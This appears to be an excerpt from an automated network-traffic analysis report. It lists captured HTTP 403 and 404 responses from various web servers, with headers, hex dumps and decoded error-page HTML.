2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xWm45VmEtXFOtL5KTwURVzrSowfX2f2Iih8%2F752OlVqHLVCi0QXWpFK9mn4ldl2StoZq9BeV1GefvTxsu8OB6TOAXbwPt2o1YVSM3%2BxHfeSCwH9a7upzs5pQWRjw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e77256df98cee-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f Data Ascii: 2bb<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 st
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:28:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=16X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-east4,gcp-us-central1,gcp-us-central1X-Request-ID: 1f357436-8a72-4bfc-b03e-bc898cf6b37fCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=h7uRFsroAEcZ6hm%2FOXR7leCa0ym%2BX%2BDL3fHz%2FPIc%2FEEEMKwCG%2ByVaqCSVBZEH6O40e%2Bk2KG1g8Aax2ys9vwVbLHwzgTcLnxwSoeZR4NMBqDmHdiy6ukAqU9A2nLG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=64.000130Server: cloudflareCF-RAY: 806e7726b98443db-EWRalt-svc: h3=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:17 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:18 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:18 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:19 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Fri, 19 Feb 2021 02:51:55 GMTETag: "713-5bba788fb1c60"Accept-Ranges: bytesContent-Length: 1811Keep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 20 34 30 33 20 2d 20 46 6f 72 62 69 64 64 65 6e 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 34 34 34 34 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 45 45 45 45 45 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 54 72 65 62 75 63 68 65 74 20 4d 53 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 68 31 20 7b 7d 0a 20 20 20 20 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 65 6d 3b 20 7d 0a 20 20 20 20 23 70 61 67 65 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 34 70 78 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 33 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 37 35 30 37 36 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 34 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 43 35 35 30 34 32 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:19 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Fri, 15 Sep 2023 05:28:19 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: PFX05Yl0/RcH9saEeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:28:19 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
